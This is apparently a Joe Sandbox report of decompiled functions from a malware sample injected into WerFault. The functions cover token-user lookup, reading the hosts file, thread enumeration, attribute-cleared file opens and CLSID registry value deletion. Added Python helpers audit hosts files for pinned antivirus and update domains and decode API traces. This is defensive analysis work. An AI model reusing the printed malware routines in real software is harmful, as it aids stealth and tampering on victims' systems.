                        • API String ID: 1299149932-3110715001
                        • Opcode ID: c5e76cab029246ccce1c436dd879060cbb4e13a1792c3278b81a890ecb0b89de
                        • Instruction ID: 320af07308aa49d2af087eda0f0ccdc9798913f901219258a93d2dfe52a6b366
                        • Opcode Fuzzy Hash: c5e76cab029246ccce1c436dd879060cbb4e13a1792c3278b81a890ecb0b89de
                        • Instruction Fuzzy Hash: 0131F23DA44118FBEB146B68CC4CBBE36A8EF05365F244619F926E77C0D7758A01CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 17%
                        			E02864B40(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                        				void* _v8;
                        				long _v12;
                        				char _v16;
                        				char _v20;
                        				char _v540;
                        				char _v1060;
                        				int _t35;
                        				int _t41;
                        				void* _t52;
                        				void* _t56;
                        
                        				if(_a4 == 0 || _a8 == 0) {
                        					L14:
                        					return 0;
                        				} else {
                        					_v12 = 0;
                        					_v16 = 0x103;
                        					_v8 = 0;
                        					_t52 = 0;
                        					E028614DB(__ecx,  &_v1060, 0, 0x208);
                        					E028614DB(__ecx,  &_v540, 0, 0x208);
                        					_push( &_v8);
                        					_push(8);
                        					_push(_a4);
                        					if( *0x289fb54() == 0 || _v8 == 0) {
                        						goto L14;
                        					} else {
                        						_t35 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
                        						if(_t35 == 0 &&  *0x289f884() == 0x7a) {
                        							_t56 = E0286161B(_v12);
                        							if(_t56 != 0) {
                        								_t41 = GetTokenInformation(_v8, 1, _t56, _v12,  &_v12); // executed; second call fills the freshly allocated TOKEN_USER
                        								if(_t41 != 0) {
                        									_push( &_v20);
                        									_push( &_v16);
                        									_push( &_v540);
                        									_push( &_v16);
                        									_push( &_v1060);
                        									_push( *_t56);
                        									_push(0);
                        									if( *0x289fb84() != 0) { // called as (NULL, Sid, &_v1060, &cch, &_v540, &cch, &use): the argument shape of LookupAccountSidW; 0x103 = 259 WCHARs per buffer
                        										 *0x289fa88(_a8, L"%s\\%s",  &_v1060,  &_v540); // wsprintfW-style: joins the two resolved strings into the caller's buffer
                        										_t52 = 1;
                        									}
                        								}
                        								E028617E4(_t56);
                        							}
                        						}
                        						if(_v8 != 0) {
                        							FindCloseChangeNotification(_v8); // executed; kernel32 implements this export with CloseHandle, so the decompiler label is a misattribution: this closes the token handle
                        						}
                        						return _t52;
                        					}
                        				}
                        			}

                        APIs
                        • GetTokenInformation.KERNELBASE(00000208,00000001,00000000,00000000,00000000), ref: 02864BBB
                        • GetTokenInformation.KERNELBASE(00000208,00000001,00000000,00000000,00000000,00000000), ref: 02864BEB
                        • FindCloseChangeNotification.KERNEL32(00000208), ref: 02864C4A
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationToken$ChangeCloseFindNotification
                        • String ID: %s\%s
                        • API String ID: 671759997-4073750446
                        • Opcode ID: bf372da26b3772fd43132810c32cfda415ebf6f98abd7e5ee4ee0821d181291d
                        • Instruction ID: 78a2ef0ccac529309dd73ea8a3df3469db27270856a83562cc4d6e831c1110b5
                        • Opcode Fuzzy Hash: bf372da26b3772fd43132810c32cfda415ebf6f98abd7e5ee4ee0821d181291d
                        • Instruction Fuzzy Hash: 70318C7E900108BEEF26DF95DC88EEEBBBDEB54344F1441A6B619E2140D7309A64CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 47%
                        			E0288543C(void* __ecx, void* __esi) {
                        				void* _v8;
                        				struct _OVERLAPPED* _v12;
                        				long _v16;
                        				short _v536;
                        				void* _t24;
                        				void* _t28;
                        				int _t34;
                        				void* _t37;
                        				long _t39;
                        
                        				_v16 = 0;
                        				_t37 = 0;
                        				_v12 = 0;
                        				E028614DB(__ecx,  &_v536, 0, 0x208);
                        				_push(0xe4);
                        				_push( &_v536);
                        				if( *0x289f738() != 0) {
                        					 *0x289fc70( &_v536, L"drivers\\etc\\hosts");
                        					_t24 = CreateFileW( &_v536, 0x80000000, 1, 0, 3, 0, 0); // executed; GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING
                        					_v8 = _t24;
                        					if(_t24 != 0xffffffff) {
                        						_t39 =  *0x289f778(_t24, 0, __esi); // unresolved import called as (hFile, NULL) right after the open: the shape of GetFileSize
                        						if(_t39 <= 6) { // hosts files of 6 bytes or less are ignored
                        							L7:
                        							E028617E4(_t37);
                        						} else {
                        							_t8 = _t39 + 1; // 0x1
                        							_t37 = E0286161B(_t8);
                        							if(_t37 == 0) {
                        								goto L7;
                        							} else {
                        								_t34 = ReadFile(_v8, _t37, _t39,  &_v16, 0); // executed
                        								if(_t34 == 0 || _v16 <= 6) {
                        									goto L7;
                        								} else {
                        									_v12 = 1;
                        								}
                        							}
                        						}
                        						 *0x289f824(_v8);
                        						if(_v12 == 1) {
                        							_t28 = 0;
                        							// If all of the first four bytes are non-NUL the raw buffer is returned as-is; a NUL among them (how a UTF-16 hosts file looks byte-wise) sends it through E02861768 first
                        							while( *((intOrPtr*)(_t28 + _t37)) != 0) {
                        								_t28 = _t28 + 1;
                        								if(_t28 < 4) {
                        									continue;
                        								} else {
                        								}
                        								goto L14;
                        							}
                        							E028617E4(_t37);
                        							_t37 = E02861768(_t37);
                        						}
                        					}
                        				}
                        				L14:
                        				return _t37;
                        			}

                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 028854A2
                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001), ref: 028854D9
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CreateRead
                        • String ID: LCT$drivers\etc\hosts
                        • API String ID: 3388366904-2045763994
                        • Opcode ID: 2715aef7ad36addb11c65392acf3af09dd96ca3bd02a671439042fb089af8b0a
                        • Instruction ID: a22288ccd40fbd8bc3f5f17bfa8f60f9a41ec0291e8409d99a20ca5b9d24dd41
                        • Opcode Fuzzy Hash: 2715aef7ad36addb11c65392acf3af09dd96ca3bd02a671439042fb089af8b0a
                        • Instruction Fuzzy Hash: 2621C47DD40218BFDB10BBB89C8CEAE77FDEB04309F558865F109E2140E7398A448B21
                        Uniqueness

                        Uniqueness Score: -1.00%
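E0288543C above reads drivers\etc\hosts, discards anything of six bytes or less, and hands the buffer back untouched only when none of its first four bytes is NUL; otherwise it converts it first, which is how a UTF-16 hosts file (the kind Notepad saves as "Unicode") presents itself to byte-wise code. The Python below is an added example, not code from the sample or from Joe Sandbox: it loads a hosts file with the same size and NUL checks, parses it, and flags entries that pin security or update domains, or any non-local name, to loopback or an unroutable address, which is what an analyst checks on a host after an infection of this family. The watch list, the rule names and the two sample files are constructed for the example.

```python
"""Load and audit a Windows hosts file with the same checks as E0288543C.

Added example, not code from the sample or the report. The routine keeps a hosts
buffer only if it is longer than 6 bytes and treats it as plain text only when
none of the first four bytes is NUL; a NUL there is how a UTF-16 file looks to
byte-wise code. The audit rules and the watch list are my own assumptions.
"""
import codecs
from typing import List, Optional, Tuple

MIN_USEFUL_SIZE = 6          # E0288543C ignores hosts files of 6 bytes or less
LOOPBACK = {"127.0.0.1", "::1", "0.0.0.0"}
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback"}
# Assumed watch list: domains malware commonly pins to loopback to cut off updates and AV.
WATCHED_DOMAINS = ("windowsupdate.com", "update.microsoft.com", "symantec.com",
                   "kaspersky.com", "mcafee.com", "avast.com", "virustotal.com")

Entry = Tuple[str, str, int]   # (address, hostname, line number)


def decode_hosts(raw: bytes) -> Optional[str]:
    """Apply the size and first-four-bytes NUL checks, then decode to text."""
    if len(raw) <= MIN_USEFUL_SIZE:
        return None
    if b"\x00" in raw[:4]:
        # UTF-16: honour a BOM, default to little-endian, which is what Windows writes.
        if raw.startswith(codecs.BOM_UTF16_BE):
            return raw[2:].decode("utf-16-be", errors="replace")
        if raw.startswith(codecs.BOM_UTF16_LE):
            raw = raw[2:]
        return raw.decode("utf-16-le", errors="replace")
    if raw.startswith(codecs.BOM_UTF8):
        raw = raw[3:]
    return raw.decode("utf-8", errors="replace")


def parse_hosts(text: str) -> List[Entry]:
    """One (address, name, line) per mapping; comments and blank lines dropped."""
    entries: List[Entry] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        body = line.split("#", 1)[0].strip()
        if not body:
            continue
        fields = body.split()
        for name in fields[1:]:
            entries.append((fields[0], name.lower().rstrip("."), lineno))
    return entries


def suspicious(entries: List[Entry]) -> List[Entry]:
    """Watched domains mapped anywhere, or non-local names pinned to loopback."""
    hits = []
    for addr, name, lineno in entries:
        on_watch_list = any(name == d or name.endswith("." + d) for d in WATCHED_DOMAINS)
        pinned_local = addr in LOOPBACK and name not in LOCAL_NAMES
        if on_watch_list or pinned_local:
            hits.append((addr, name, lineno))
    return hits


def audit(raw: bytes) -> List[Entry]:
    """Full pipeline on raw file bytes; an unusable file yields no findings."""
    text = decode_hosts(raw)
    return [] if text is None else suspicious(parse_hosts(text))


# Constructed sample files: an ANSI one with two injected lines, and a UTF-16 one.
SAMPLE_ANSI = (b"# Copyright (c) 1993-2009 Microsoft Corp.\r\n"
               b"127.0.0.1 localhost\r\n"
               b"::1 localhost\r\n"
               b"127.0.0.1 www.virustotal.com\r\n"
               b"0.0.0.0 update.microsoft.com # injected\r\n")
SAMPLE_UTF16 = codecs.BOM_UTF16_LE + (
    "127.0.0.1 localhost\r\n127.0.0.1 liveupdate.symantec.com\r\n".encode("utf-16-le"))

if __name__ == "__main__":
    for label, data in (("ansi", SAMPLE_ANSI), ("utf16", SAMPLE_UTF16), ("stub", b"#\r\n")):
        print(label, audit(data))
```

On a live system the bytes come from `%SystemRoot%\System32\drivers\etc\hosts`; the file is read as bytes, not text, precisely so that the UTF-16 case is caught the same way the sample catches it. A reviewer should treat any hit on the watch list as an indicator and compare the file's modification time against the infection window.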

                        C-Code - Quality: 84%
                        			E0286397D(intOrPtr* _a4) {
                        				void* _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				void* _v40;
                        				intOrPtr* _t17;
                        				signed int _t18;
                        				void* _t20;
                        				int _t24;
                        				intOrPtr _t25;
                        				int _t27;
                        				intOrPtr _t33;
                        				void* _t35;
                        				void* _t36;
                        				signed int _t40;
                        				intOrPtr _t43;
                        
                        				_t17 = _a4;
                        				_t40 = 0;
                        				if(_t17 == 0 ||  *_t17 != 0xa94) {
                        					_t18 = 0;
                        					goto L10;
                        				} else {
                        					_t33 =  *((intOrPtr*)(_t17 + 0xc));
                        					_v12 = _t33;
                        					_t43 = E0286161B(0xfa0);
                        					if(_t43 == 0 || _t33 == 0) {
                        						L8:
                        						_t18 = 0;
                        						goto L9;
                        					} else {
                        						_t20 = CreateToolhelp32Snapshot(4, 0); // executed; 4 = TH32CS_SNAPTHREAD, every thread on the system
                        						_v8 = _t20;
                        						if(_t20 == 0xffffffff) {
                        							goto L8;
                        						}
                        						_t35 = 0x1c;
                        						E028614DB(0xa94,  &_v40, 0, _t35);
                        						_v40 = _t35;
                        						_t36 = _v8;
                        						_t24 = Thread32First(_t36,  &_v40); // executed
                        						if(_t24 != 0) {
                        							do {
                        								_t25 = _v32;
                        								if(_t25 != 0 && _v28 == _v12) { // THREADENTRY32 (dwSize 0x1c): _v32 is th32ThreadID, _v28 is th32OwnerProcessID, compared with the PID taken from the context block at +0xc
                        									 *((intOrPtr*)(_t43 + _t40 * 4)) = _t25;
                        									_t40 = _t40 + 1;
                        									if(_t40 >= 0x3e8) { // cap of 1000 thread IDs; the buffer allocated above is 0xfa0 = 1000 * 4 bytes
                        										break;
                        									}
                        								}
                        								_t27 = Thread32Next(_t36,  &_v40); // executed
                        							} while (_t27 != 0);
                        							FindCloseChangeNotification(_t36); // executed; same implementation as CloseHandle in kernel32, so this closes the snapshot
                        							if(_t40 == 0) {
                        								E028617E4(_t43);
                        								_t43 = 0;
                        							}
                        							 *((intOrPtr*)(_a4 + 0x668)) = _t43; // thread-ID array stored in the context block for the caller; the count is returned
                        							_t18 = _t40;
                        							L9:
                        							L10:
                        							return _t18;
                        						}
                        						 *0x289f824(_t36);
                        						goto L8;
                        					}
                        				}
                        			}

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,00000FA0,00000A94,00000000,028A0044,?,02865B8E,?,?,00000000,00000A94,028A0044,?,00000000), ref: 028639BA
                        • Thread32First.KERNEL32(00000000,?,?,00000000,0000001C,?,02865B8E,?,?,00000000,00000A94,028A0044,?,00000000), ref: 028639E2
                        • Thread32Next.KERNEL32(00000000,?,?,02865B8E,?,?,00000000,00000A94,028A0044,?,00000000), ref: 02863A1C
                        • FindCloseChangeNotification.KERNEL32(00000000,?,02865B8E,?,?,00000000,00000A94,028A0044,?,00000000), ref: 02863A27
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Thread32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                        • String ID:
                        • API String ID: 3913586313-0
                        • Opcode ID: 61463d99ff4e740fc037bee02b8ef35920cc0a7746bf20122f6e81df404a7431
                        • Instruction ID: fd2035fd212f12b17d93f6b74a56968e0599da25faae0ed5f0af423ac3df9f0f
                        • Opcode Fuzzy Hash: 61463d99ff4e740fc037bee02b8ef35920cc0a7746bf20122f6e81df404a7431
                        • Instruction Fuzzy Hash: 1521C77DA00205AEDB10DB78CC8CFBE77F8AB49B56F1405A9E90AE3181D735D940CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E028833DE() {
                        				long _t3;
                        				void* _t7;
                        				struct _SECURITY_ATTRIBUTES* _t16;
                        				WCHAR* _t19;
                        				long _t21;
                        				void* _t24;
                        
                        				_t19 =  *0x289f2e8 + 0x1646;
                        				_t16 = 0;
                        				if(E028619E8(_t19) >= 6) {
                        					if( *0x28a0660 != 0) {
                        						goto L1;
                        					} else {
                        						_t3 = GetFileAttributesW(_t19); // executed
                        						_t21 = _t3;
                        						if(_t21 != 0x80) { // 0x80 = FILE_ATTRIBUTE_NORMAL
                        							SetFileAttributesW( *0x289f2e8 + 0x1646, 0x80); // executed; clears hidden/system/read-only so the open below succeeds
                        						}
                        						_t7 = CreateFileW( *0x289f2e8 + 0x1646, 0x10000, 3, _t16, 3, _t16, _t16); // executed; DELETE access, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING
                        						_t24 = _t7;
                        						if(_t24 == 0xffffffff) {
                        							_t24 = 0;
                        						} else {
                        							_t16 = 1;
                        						}
                        						if(_t21 != 0xffffffff) { // 0xffffffff = INVALID_FILE_ATTRIBUTES, i.e. the query above failed
                        							SetFileAttributesW( *0x289f2e8 + 0x1646, _t21); // executed; restores the original attributes
                        						}
                        						 *0x289f828(_t24, 2, 2);
                        						 *0x28a0660 = _t24; // handle parked in a global; the check at the top makes the function a no-op once it is set
                        						return _t16;
                        					}
                        				} else {
                        					L1:
                        					return 0;
                        				}
                        			}

                        APIs
                        • GetFileAttributesW.KERNEL32(?,?,?,00000000,02883528,?,00000000,?,?,0286FCFA), ref: 02883408
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000,02883528,?,00000000,?,?,0286FCFA), ref: 02883425
                        • CreateFileW.KERNEL32(?,00010000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,02883528,?,00000000), ref: 02883442
                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000000,02883528,?,00000000,?,?,0286FCFA), ref: 02883466
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Attributes$Create
                        • String ID:
                        • API String ID: 1801647141-0
                        • Opcode ID: a6078fe62d8f85461580ef1dec4b0e2aaf73a7e63695267fc63db4b54c46fa75
                        • Instruction ID: 0c337e9c9729fe7201b90c06eb7046aaddeb8cc261165f76bc0f36c901d19bc1
                        • Opcode Fuzzy Hash: a6078fe62d8f85461580ef1dec4b0e2aaf73a7e63695267fc63db4b54c46fa75
                        • Instruction Fuzzy Hash: 1301267EE802106BD7246EACFC89FD6225DD799B69F1C4A21F205D36C0CB3188608794
                        Uniqueness

                        Uniqueness Score: -1.00%
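The "APIs" lists in the four preceding function cards (the token query in E02864B40, the hosts-file open in E0288543C, the thread snapshot in E0286397D and the attribute juggling in E028833DE) are raw hook output: positional hex arguments, "?" where the hook could not read a slot, and trailing stack noise well past the API's real argument count. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that turns such lines into named, decoded calls and raises a few triage tags; the argument schemas, the constant tables and the tag names are my own choices, and the sample trace is copied from the cards above.

```python
"""Decode raw Joe Sandbox 'APIs' trace lines into named Win32 calls.

Added example, not part of the report or of the sample. Input lines look like
'• Api.MODULE(arg,arg,...), ref: ADDR'. The hook prints '?' for slots it could
not read and keeps dumping stack slots past the real argument count, so every
schema truncates to the API's true arity. Schemas cover only APIs seen here.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple

LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
Decoder = Callable[[int], str]


def _flags(table: Dict[int, str]) -> Decoder:
    """Render a bitmask as NAME|NAME; unknown bits stay as hex, zero renders as '0'."""
    def decode(value: int) -> str:
        names = [name for bit, name in table.items() if value & bit]
        rest = value & ~sum(table)
        return "|".join(names + ([hex(rest)] if rest else [])) or "0"
    return decode


def _enum(table: Dict[int, str]) -> Decoder:
    return lambda value: table.get(value, hex(value))


ACCESS = _flags({0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x10000: "DELETE"})
SHARE = _flags({1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"})
DISPOSITION = _enum({1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                     4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"})
FILE_ATTRS = _flags({1: "FILE_ATTRIBUTE_READONLY", 2: "FILE_ATTRIBUTE_HIDDEN",
                     4: "FILE_ATTRIBUTE_SYSTEM", 0x80: "FILE_ATTRIBUTE_NORMAL"})
SNAP = _flags({1: "TH32CS_SNAPHEAPLIST", 2: "TH32CS_SNAPPROCESS",
               4: "TH32CS_SNAPTHREAD", 8: "TH32CS_SNAPMODULE"})
TOKEN_CLASS = _enum({1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges", 4: "TokenOwner",
                     18: "TokenElevationType", 20: "TokenElevation", 25: "TokenIntegrityLevel"})

# (argument name, decoder or None for plain hex), in call order, true arity only.
SCHEMAS: Dict[str, List[Tuple[str, Optional[Decoder]]]] = {
    "GetTokenInformation": [("TokenHandle", None), ("TokenInformationClass", TOKEN_CLASS),
                            ("TokenInformation", None), ("TokenInformationLength", None),
                            ("ReturnLength", None)],
    "CreateFileW": [("lpFileName", None), ("dwDesiredAccess", ACCESS), ("dwShareMode", SHARE),
                    ("lpSecurityAttributes", None), ("dwCreationDisposition", DISPOSITION),
                    ("dwFlagsAndAttributes", FILE_ATTRS), ("hTemplateFile", None)],
    "ReadFile": [("hFile", None), ("lpBuffer", None), ("nNumberOfBytesToRead", None),
                 ("lpNumberOfBytesRead", None), ("lpOverlapped", None)],
    "CreateToolhelp32Snapshot": [("dwFlags", SNAP), ("th32ProcessID", None)],
    "GetFileAttributesW": [("lpFileName", None)],
    "SetFileAttributesW": [("lpFileName", None), ("dwFileAttributes", FILE_ATTRS)],
    "FindCloseChangeNotification": [("hHandle", None)],
}


def parse_line(line: str) -> Optional[Dict]:
    """Parse one trace line: '?' becomes None, hex strings become ints."""
    m = LINE_RE.match(line.strip().lstrip("\u2022").strip())
    if not m:
        return None
    raw = [a.strip() for a in m.group("args").split(",") if a.strip()]
    return {"api": m.group("api"), "module": m.group("module"),
            "args": [None if a == "?" else int(a, 16) for a in raw],
            "ref": int(m.group("ref"), 16)}


def parse_trace(text: str) -> List[Dict]:
    return [c for c in (parse_line(ln) for ln in text.splitlines()) if c]


def annotate(call: Dict) -> str:
    """Render a parsed call with named, decoded arguments, cut to its arity."""
    schema = SCHEMAS.get(call["api"])
    if schema is None:
        return f"{call['api']}({', '.join('?' if a is None else hex(a) for a in call['args'])})"
    parts = []
    for (name, decoder), value in zip(schema, call["args"]):
        text = "?" if value is None else (hex(value) if decoder is None else decoder(value))
        parts.append(f"{name}={text}")
    return f"{call['api']}({', '.join(parts)})"


def _arg(call: Dict, i: int) -> Optional[int]:
    return call["args"][i] if i < len(call["args"]) else None


def triage_tags(calls: List[Dict]) -> List[str]:
    """Behaviour tags worth raising on this trace (tag names are my own)."""
    tags = set()
    for c in calls:
        api, a1 = c["api"], _arg(c, 1)
        if api == "GetTokenInformation" and a1 == 1:
            tags.add("queries-token-user")
        if api == "CreateToolhelp32Snapshot" and (_arg(c, 0) or 0) & 4:
            tags.add("enumerates-threads")
        if api == "CreateFileW" and (a1 or 0) & 0x10000:
            tags.add("opens-file-with-DELETE")
        if api == "SetFileAttributesW" and a1 == 0x80:
            tags.add("clears-file-attributes")
    return sorted(tags)


# Trace lines copied verbatim from the function cards above.
SAMPLE_TRACE = """\
• GetTokenInformation.KERNELBASE(00000208,00000001,00000000,00000000,00000000), ref: 02864BBB
• GetTokenInformation.KERNELBASE(00000208,00000001,00000000,00000000,00000000,00000000), ref: 02864BEB
• FindCloseChangeNotification.KERNEL32(00000208), ref: 02864C4A
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 028854A2
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,00000FA0,00000A94,00000000,028A0044,?,02865B8E,?,?,00000000,00000A94,028A0044,?,00000000), ref: 028639BA
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000,02883528,?,00000000,?,?,0286FCFA), ref: 02883425
• CreateFileW.KERNEL32(?,00010000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,02883528,?,00000000), ref: 02883442
"""

if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    for call in calls:
        print(f"{call['ref']:08X}  {annotate(call)}")
    print("tags:", ", ".join(triage_tags(calls)))
```

Truncating to the true arity is the important step: the Toolhelp line above carries fifteen slots, of which only the first two are arguments, and reading the rest as parameters is a common mistake when report lines are pasted into rules. The "?" slots stay unknown rather than being guessed.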

                        C-Code - Quality: 55%
                        			E0288E905(signed int _a4) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				signed int _v20;
                        				char _v52;
                        				struct tagMSG _v80;
                        				char _v340;
                        				signed int _t40;
                        				signed int _t50;
                        				void* _t52;
                        				void* _t54;
                        				signed int _t55;
                        				void* _t57;
                        				signed int _t58;
                        				void* _t59;
                        				void* _t67;
                        				signed int _t71;
                        				intOrPtr _t87;
                        				intOrPtr _t88;
                        				intOrPtr _t92;
                        				void* _t94;
                        				signed int _t98;
                        				signed int _t100;
                        				void* _t101;
                        
                        				if(_a4 == 0) {
                        					return 0;
                        				}
                        				_t87 =  *0x289f2e8;
                        				__eflags = E0286D774( *(_t87 + 4) & 0x0000ffff) - 1;
                        				if(__eflags == 0) {
                        					__eflags =  *(_t87 + 0xa) & 0x00000010;
                        					if(__eflags == 0) {
                        						E028846D8(_t87, __eflags);
                        					}
                        				}
                        				_t98 = E0288E7D9(_t87, __eflags);
                        				E028614DB(_t87,  &_v52, 0, 0x20);
                        				_t40 =  *0x289f544;
                        				__eflags = _t40;
                        				if(_t40 != 0) {
                        					 *_t40(0x4a, 1);
                        				}
                        				__eflags = _t98;
                        				if(_t98 != 0) {
                        					_t88 =  *0x289f2e8;
                        					__eflags = E0286D774( *(_t88 + 4) & 0x0000ffff) - 1;
                        					if(__eflags == 0) {
                        						 *(_t88 + 0x15e) = _t98;
                        					}
                        					 *0x28a4104 = _t98;
                        					 *0x28a4100 = E028845E1(_t88, __eflags);
                        					_v20 =  *( *0x289f2e8 + 4) & 0x0000ffff;
                        					_v16 =  *0x289f848(_t94);
                        					_v12 = E0288F18D;
                        					_v8 = _t98;
                        					E028614DB(_t88,  &_v52, 0, 0x20);
                        					_t50 = E02861844( *0x289fdb4,  &_v52);
                        					__eflags = _t50;
                        					if(_t50 != 0) {
                        						E02862FDA(0x2890294,  &_v52,  &_v20, 0x10); // executed
                        					}
                        					while(1) {
                        						_t52 =  *0x289fa50( &_v80, 0, 0, 0); // called as (lpMsg, NULL, 0, 0): the shape of GetMessageA; -1 signals an error
                        						__eflags = _t52 - 0xffffffff;
                        						if(_t52 == 0xffffffff) {
                        							break;
                        						}
                        						__eflags =  *0x289ec92;
                        						if( *0x289ec92 == 0) {
                        							break;
                        						}
                        						__eflags = _v80.message - 0x12;
                        						if(_v80.message != 0x12) { // 0x12 = WM_QUIT
                        							 *0x289fa44( &_v80);
                        							DispatchMessageA( &_v80); // executed
                        						}
                        					}
                        					_t92 =  *0x289f2e8;
                        					_t54 = E0286D774( *(_t92 + 4) & 0x0000ffff);
                        					__eflags = _t54 - 1;
                        					if(_t54 == 1) {
                        						 *((intOrPtr*)(_t92 + 0x15e)) = 0;
                        					}
                        					_t55 = E028619D6( &_v52);
                        					__eflags = _t55;
                        					if(_t55 != 0) {
                        						_t58 = E028619D6(0x2890294);
                        						__eflags = _t58;
                        						if(_t58 != 0) {
                        							_t93 = _t92 + 0x2632;
                        							_t91 = _t92 + 0x2632;
                        							_t59 = E028619D6(_t92 + 0x2632);
                        							__eflags = _t59 - 8;
                        							if(_t59 >= 8) {
                        								_t100 = E02864664(_t93);
                        								__eflags = _t100;
                        								if(_t100 != 0) {
                        									E028614DB(_t91,  &_v340, 0, 0x104);
                        									 *0x289fa84( &_v340, "Software\\Classes\\CLSID\\%s\\%08X\\%s", _t100,  *((intOrPtr*)( *0x289f2e8 + 0x2616)), 0x2890294); // builds Software\Classes\CLSID\<clsid string from E02864664>\<8 hex digits from the context block>\<name>
                        									E028617E4(_t100);
                        									_t67 = E02866091();
                        									_t101 = _t67;
                        									_a4 = 0;
                        									 *0x289f968( *0x289ec4a, 0x4d2);
                        									_t71 =  *0x289fae0(0x80000001,  &_v340, 0, 2,  &_a4); // 0x80000001 = HKEY_CURRENT_USER, 2 = KEY_SET_VALUE; (hKey, subkey, options, sam, &result) is the shape of RegOpenKeyExA
                        									__eflags = _t71;
                        									if(_t71 == 0) {
                        										__eflags = _a4;
                        										if(_a4 != 0) {
                        											 *0x289fae8(_a4,  &_v52); // (hKey, valueName) shape, RegDeleteValue-like: removes the value whose 32-byte name was generated above
                        											 *0x289fb1c(_a4); // (hKey): closes the key
                        										}
                        									}
                        									__eflags = _t101 - 1;
                        									if(_t101 == 1) {
                        										 *0x289f968( *0x289ec4a, 0);
                        									}
                        								}
                        							}
                        						}
                        					}
                        					_t57 = 1;
                        					__eflags = 1;
                        					goto L29;
                        				} else {
                        					_t57 = 0;
                        					L29:
                        					return _t57;
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: CW1$Software\Classes\CLSID\%s\%08X\%s
                        • API String ID: 0-3954956548
                        • Opcode ID: 2a52dbef479af3209a6b32e1a82151a9e67a7bd6688e355634fef9786c2610de
                        • Instruction ID: c4a5b82342af3eaae8ba87aade31420f4486e9bc730e7a1c333d412ee6a7eb90
                        • Opcode Fuzzy Hash: 2a52dbef479af3209a6b32e1a82151a9e67a7bd6688e355634fef9786c2610de
                        • Instruction Fuzzy Hash: 6751C27DD40108BBDB14BFA4DC88EFE7BADAB14305F084826F60AE6581D7748961CF65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
